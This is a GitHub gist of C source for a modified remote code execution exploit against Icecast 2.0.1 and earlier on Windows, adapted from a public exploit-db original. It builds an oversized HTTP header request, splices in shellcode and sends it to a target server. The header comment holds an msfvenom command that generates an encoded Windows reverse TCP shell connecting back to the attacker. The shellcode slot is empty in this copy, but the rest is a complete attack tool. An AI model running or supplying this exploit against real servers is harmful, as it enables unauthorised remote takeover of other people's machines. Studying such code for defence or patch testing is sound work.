@3lpsy
Last active May 9, 2020 21:29
Modified exploit for 2004-1561
/*
Original Exploit by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Original Exploit: https://www.exploit-db.com/exploits/568
Modifications made by @3lpsy
This modified version compiles only on Linux.
Shellcode created with:
$ msfvenom -p windows/shell/reverse_tcp LHOST=XXXX LPORT=443 -e x86/shikata_ga_nai --platform windows -f c -b '\x0d\x0a\x00'
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#define VER "0.1"
/* Size of the reply buffer main() reads into after sending the request. */
#define BUFFSZ 2048
/* Seconds timeout() waits for the server to answer; main() treats an
 * expired wait as its "vulnerable" verdict. */
#define TIMEOUT 3
/* Request main() sends: a GET line, 31 one-byte header lines ("a") and a
 * trailing 0xcc byte. main() finds that 0xcc with strrchr() and overwrites
 * it (and what follows) with shellcode[]. */
u_char EXEC[] = "GET / HTTP/1.0\r\n"
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
"\xcc";
// Place msfvenom shellcode here:
/* Empty in this copy. main() strcpy()s it over the 0xcc marker, so with no
 * payload the marker becomes the terminating NUL and is not sent at all;
 * any NUL inside the payload would likewise cut the request short, since
 * main() sends strlen(buf) bytes. */
unsigned char shellcode[] = "";
/* Wait up to TIMEOUT seconds for sock to become readable: 0 ready, -1 timed out. */
int timeout(int sock);
/* Dotted quad or hostname -> IPv4 address in network byte order; exits on failure. */
u_long resolv(char *host);
/* perror() the current errno, then exit(1). */
void std_err(void);
int main(int argc, char *argv[]) {
/* Build the request from EXEC[] and shellcode[], send it to <server>:<port>
 * and print a verdict based on whether the server answers. Exits with 1 on
 * usage or socket errors (via std_err), otherwise 0 whatever the verdict. */
printf("EXEC:\n");
printf("%s\n", EXEC);
struct sockaddr_in peer;
int sd;
/* NOTE(review): atoi() into a short wraps ports above 32767 before htons();
 * an unsigned short would hold the full 16-bit range. */
short port = 8000;
u_char buff[BUFFSZ];
u_char buf[4096];
u_char *pointer=NULL;
/* Unbuffered stdout so each progress line is visible before a blocking
 * connect()/recv(). */
setbuf(stdout, NULL);
fputs("\n"
"Icecast <= 2.0.1 Win32 remote code execution "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web:http://aluigi.altervista.org\n"
"\nshellcode add-on by Delikon\n"
"www.delikon.de"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], 8000);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
printf("Port: %d\n", port);
printf("Building peer socket...\n");
/* NOTE(review): peer is never zeroed, so sin_zero holds stack garbage;
 * connect() ignores it, but memset(&peer, 0, sizeof peer) would be cleaner. */
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family= AF_INET;
printf("Nullifying buff...\n");
memset(buf,0x00,sizeof(buf));
printf("Filling buf with EXEC...\n");
/* EXEC is far smaller than the 4096-byte buf, so this copy fits. buf and
 * EXEC are u_char while strcpy() takes char *, which only draws a
 * pointer-sign warning. */
strcpy(buf,EXEC);
printf("Pointifying buff...\n");
printf("Start of buf pointer: %p\n", (u_char *) &buf);
/* Locate the 0xcc byte that ends EXEC; it is the splice point for shellcode[]. */
pointer = strrchr(buf,0xcc);
printf("Inject Point Pointer: %p\n", pointer);
printf("Copying shellcode to pointer...\n");
/* NOTE(review): nothing checks that strlen(shellcode) fits in the space left
 * after the marker, so an oversized payload overruns this tool's own stack
 * buffer. With the empty default the marker is just replaced by a NUL. */
strcpy(pointer,shellcode);
printf("Adding returns to buf...\n");
/* Blank line that ends the HTTP header block. */
strcat(buf,"\r\n");
strcat(buf,"\r\n");
printf("Target: %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
printf("Creating socket...\n");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("Connecting socket...\n");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf("Sending malforemd data...\n");
/* strlen() stops at the first NUL, so a NUL inside shellcode[] truncates the
 * request here (the msfvenom line in the file header excludes \x00 for that
 * reason). */
if(send(sd, buf, strlen(buf), 0)
< 0) std_err();
printf("Awaiting confirmation of exploitation...\n");
/* Verdict heuristic: no data within TIMEOUT seconds, or a recv() error such
 * as a reset, is reported as "vulnerable"; any reply, or a clean close
 * (recv() returning 0), is reported as "doesn't seem vulnerable". A slow or
 * filtering server is therefore counted as vulnerable, so this is only an
 * indication, not a confirmation. */
if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
    /* Block for up to TIMEOUT seconds until sock is readable.
     * Returns 0 when the socket has data (or EOF) pending and -1 when the
     * wait expires. A select() failure is fatal: std_err() reports errno
     * and exits the process. */
    fd_set readable;
    struct timeval wait = { .tv_sec = TIMEOUT, .tv_usec = 0 };

    FD_ZERO(&readable);
    FD_SET(sock, &readable);

    int ready = select(sock + 1, &readable, NULL, NULL, &wait);
    if(ready < 0) std_err();

    return ready ? 0 : -1;
}
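u_long resolv(char *host) {
    /* Resolve host, given as a dotted quad or a hostname, to an IPv4 address
     * in network byte order (main() stores the result in sin_addr).
     * On an unresolvable name the function prints a message and exit(1)s. */
    in_addr_t host_ip = inet_addr(host);
    if(host_ip != INADDR_NONE) return host_ip;

    struct hostent *hp = gethostbyname(host);
    /* Only accept an IPv4 entry of exactly sizeof(in_addr_t) bytes; anything
     * else is reported as unresolvable rather than read as garbage. */
    if(!hp || hp->h_addrtype != AF_INET
       || hp->h_length != (int)sizeof host_ip || !hp->h_addr_list[0]) {
        printf("\nError: Unable to resolve hostname (%s)\n", host);
        exit(1);
    }
    /* h_addr is h_length (4) bytes long. The original read it through a
     * u_long *, which on 64-bit Linux over-reads 8 bytes and breaks strict
     * aliasing; memcpy() of the exact width is the portable form. */
    memcpy(&host_ip, hp->h_addr_list[0], sizeof host_ip);
    return host_ip;
}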
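void std_err(void) {
    /* Report the last failing call via errno and abort the run with status 1.
     * perror() appends ": <strerror>\n" itself, so the message must not carry
     * its own newline (the original did, which split the report over two
     * lines with the errno text orphaned on the second). */
    perror("An error happened. My Bad.");
    exit(1);
}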